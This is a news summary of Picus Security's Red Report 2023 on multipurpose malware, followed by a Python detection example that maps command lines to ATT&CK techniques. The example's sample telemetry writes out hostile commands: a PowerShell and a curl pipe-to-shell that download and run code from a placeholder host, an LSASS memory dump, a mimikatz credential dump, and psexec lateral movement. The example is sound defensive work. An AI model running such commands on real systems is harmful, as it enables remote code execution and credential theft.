"Experts Warn of Surge in Multipurpose Malware"

Security researchers at Picus Security have warned that a growing number of versatile malware variants are capable of performing multiple malicious actions across the cyber-kill chain. Picus Security compiled its Red Report 2023 by analyzing over 500,000 malware samples last year, identifying their tactics, techniques, and procedures (TTPs), and extracting over 5.3 million "actions." The vendor then mapped these actions to MITRE ATT&CK techniques.

The researchers found that the average malware variant now leverages 11 TTPs or nine MITRE ATT&CK techniques. One-third (32%) use more than 20 TTPs, and one in 10 leverage over 30 TTPs. The researchers noted that this "Swiss Army knife" malware can enable attackers to move through networks undetected at great speed, obtain credentials to access critical systems, and encrypt data.

The researchers found that 40% of the most prevalent MITRE ATT&CK techniques they identified were used to help with lateral movement. These included tried-and-tested techniques such as Command and Scripting Interpreter and OS Credential Dumping, and newer ones such as Remote Services, Remote System Discovery, and WMI.

The researchers noted that the most common technique used was Command and Scripting Interpreter, which involves the abuse of legitimate interpreters such as PowerShell, AppleScript, and Unix shells to execute arbitrary commands. The researchers stated that this highlights how hackers favor legitimate existing tools in their attacks rather than custom-developed ones. The second most common technique used was OS Credential Dumping, which attackers use to hijack accounts and move laterally. Third came Data Encrypted for Impact, which reveals the continued threat posed by ransomware.
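The report's method, as summarized above, is to map each observed malware "action" to a MITRE ATT&CK technique and then count distinct techniques per sample to find "Swiss Army knife" variants. The following is an added example illustrating that pipeline from a detection-engineering angle; it is not code from Picus Security or the Infosecurity article. The regex indicators and the telemetry records are constructed for the example; the technique IDs (T1059.x, T1003.001, T1047, T1018, T1021) are the real ATT&CK IDs for the techniques named in the summary, and the `threshold` parameter is the only knob (the report's own cut-offs were 20 and 30 TTPs).

```python
"""Map observed actions to ATT&CK techniques and profile samples by technique count.

Added example: the rules are constructed heuristics, not a production ruleset,
and the telemetry below is constructed, not from any real malware sample.
"""
import re
from collections import Counter, defaultdict

# Indicator -> ATT&CK technique ID. Regexes are illustrative heuristics; the IDs are
# the real ATT&CK identifiers for the techniques named in the report summary.
RULES = [
    (re.compile(r"powershell.*?(-encodedcommand|\biex\b|downloadstring)", re.I),
     "T1059.001"),  # Command and Scripting Interpreter: PowerShell
    (re.compile(r"(^|[/\s])(bash|sh|zsh)\s+-c\s", re.I),
     "T1059.004"),  # Command and Scripting Interpreter: Unix Shell
    (re.compile(r"\bosascript\b", re.I),
     "T1059.002"),  # Command and Scripting Interpreter: AppleScript
    (re.compile(r"lsass|sekurlsa::", re.I),
     "T1003.001"),  # OS Credential Dumping: LSASS Memory
    (re.compile(r"\bwmic\b.*process\s+call\s+create", re.I),
     "T1047"),      # Windows Management Instrumentation
    (re.compile(r"\bnet\s+view\b|\bnltest\s+/dclist", re.I),
     "T1018"),      # Remote System Discovery
    (re.compile(r"\bpsexec\b|\bwinrs\b", re.I),
     "T1021"),      # Remote Services
]


def map_action(cmdline):
    """Return the set of ATT&CK technique IDs matched by one observed action."""
    return {tid for rx, tid in RULES if rx.search(cmdline)}


def profile_samples(records):
    """records: iterable of (sample_id, command_line).

    Returns {sample_id: set of distinct technique IDs}; a sample whose actions
    match no rule still appears, with an empty set, so it counts in averages.
    """
    profile = defaultdict(set)
    for sample_id, cmdline in records:
        profile[sample_id] |= map_action(cmdline)
    return dict(profile)


def summarize(profile, threshold=20):
    """Aggregate the way the report does: average distinct techniques per sample,
    share of samples above `threshold`, which samples those are, and technique
    prevalence (number of samples using each technique), sorted deterministically."""
    counts = [len(techs) for techs in profile.values()]
    n = len(counts)
    prevalence = Counter(tid for techs in profile.values() for tid in techs)
    return {
        "avg_techniques": sum(counts) / n if n else 0.0,
        "share_over_threshold": sum(c > threshold for c in counts) / n if n else 0.0,
        "multipurpose": sorted(s for s, t in profile.items() if len(t) > threshold),
        "prevalence": sorted(prevalence.items(), key=lambda kv: (-kv[1], kv[0])),
    }


# Constructed telemetry: (sample id, observed command line). Not real samples.
SAMPLE_ACTIONS = [
    ("sample-A", "powershell.exe -nop -w hidden -EncodedCommand <base64-placeholder>"),
    ("sample-A", "rundll32.exe C:\\Windows\\System32\\comsvcs.dll MiniDump 612 C:\\temp\\lsass.dmp full"),
    ("sample-A", "wmic /node:10.0.0.12 process call create \"cmd /c whoami\""),
    ("sample-A", "net view /domain"),
    ("sample-A", "psexec.exe \\\\10.0.0.12 -s cmd.exe"),
    ("sample-B", "powershell -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"),
    ("sample-B", "mimikatz.exe \"sekurlsa::logonpasswords\" exit"),
    ("sample-C", "/bin/sh -c 'curl -s http://example.invalid/x | sh'"),
    ("sample-D", "notepad.exe C:\\Users\\u\\readme.txt"),  # benign; matches no rule
]


if __name__ == "__main__":
    profile = profile_samples(SAMPLE_ACTIONS)
    for sample, techs in sorted(profile.items()):
        print(f"{sample}: {len(techs)} techniques {sorted(techs)}")
    # Threshold lowered to 3 for the toy data; the report used 20 and 30.
    print(summarize(profile, threshold=3))
```

Two points worth noting for anyone adapting this: the prevalence ranking is sorted by count and then technique ID so that tie order does not depend on set iteration order, and the Unix-shell rule anchors on a path separator or whitespace before `sh` so that `powershell -c` is not miscounted as a Unix shell invocation, which is the kind of overlap that inflates per-sample technique counts if left unchecked.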


Infosecurity reports: "Experts Warn of Surge in Multipurpose Malware"
